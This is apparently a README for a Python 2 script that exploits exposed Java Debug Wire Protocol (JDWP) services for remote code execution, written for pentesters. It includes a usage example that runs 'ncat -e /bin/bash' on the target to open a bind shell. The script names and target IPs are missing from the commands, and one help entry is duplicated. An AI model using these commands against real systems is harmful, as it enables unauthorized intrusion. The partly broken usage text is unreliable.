What is it ?

This exploitation script is meant to be used by pentesters against active JDWP service, in order to gain Remote Code Execution.

How does it work ?

Well, in a pretty standard way, the script only requires a Python 2 interpreter:

% python ./ -h
usage: [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
                      [--cmd COMMAND]

Universal exploitation script for JDWP by @_hugsy_

optional arguments:
-h, --help            show this help message and exit
-t IP, --target IP    Remote target IP (default: None)
-p PORT, --port PORT  Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
	--cmd COMMAND         Specify full path to method to break on (default:

To target a specific host/port:

$ python ./ -t -p 1234

This command will only inject Java code on the JVM and show some info like Operating System, Java version. Since it does not execute external code/binary, it is totally safe and can be used as Proof-Of-Concept

$ python ./ -t -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

This command will actually execute the process ncat with the specified argument with the rights given to the running JVM.

Before sending questions, make sure to read for full understanding of the JDWP protocol.


  • Ilja Van Sprundel
  • Sebastien Macke


  1. ROKRAT Reloaded
  2. Hacker101: Free class for web security. Let’s break some stuff
  3. ikoz/jdwp-lib-injector
  4. m0rtem/CloudFail
  5. mdsecactivebreach/RDPInception: A proof of concept for the RDP Inception Attack